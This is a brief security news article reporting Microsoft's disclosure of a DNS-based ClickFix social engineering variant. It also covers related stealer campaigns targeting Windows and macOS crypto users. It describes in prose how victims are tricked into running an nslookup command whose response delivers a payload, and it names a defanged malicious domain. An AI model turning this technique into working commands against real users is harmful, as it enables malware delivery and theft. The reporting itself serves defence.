ClickFix 2.0: How Attackers Are Hijacking DNS to Steal Your Data
Microsoft just revealed a DNS-based attack that turns your own computer into a trap—no phishing link needed.
Microsoft disclosed a new DNS-based variation of the ClickFix social engineering tactic, using nslookup commands to trigger malicious DNS lookups via the Windows Run dialog.
Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution. pic.twitter.com/NFbv1DJsXn
— Microsoft Threat Intelligence (@MsftSecIntel) February 13, 2026
The output is filtered to extract the `Name:` DNS response, which is executed as the second-stage payload, according to Microsoft's Threat Intelligence team. This attack chain leads to the download of a ZIP archive from "azwsappdev[.]com" containing a Python script and ModeloRAT, a Python-based remote access trojan.
Bitdefender reported a surge in Lumma Stealer activity via ClickFix-style fake CAPTCHA campaigns distributing CastleLoader, which checks for virtualization and security tools before launching malware. "The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender noted.
Campaigns using ClickFix now target macOS with stealer malware like Odyssey Stealer, which exfiltrates cryptocurrency wallet data from 203 browser extensions and 18 desktop apps.
A novel technique called EtherHiding leverages blockchain (BNB Smart Chain) to fetch payloads via GitHub, blending malicious traffic with legitimate Web3 activity.
Flare reported 103 Chrome crypto extensions targeted by macOS stealers, exploiting Apple developer signatures to bypass Gatekeeper. "Cryptocurrency users disproportionately use Macs. Once seed phrases are compromised, funds disappear permanently with no recourse," Flare observed.
Recommended Reading
Yunus Yagis
Yunus Yagis
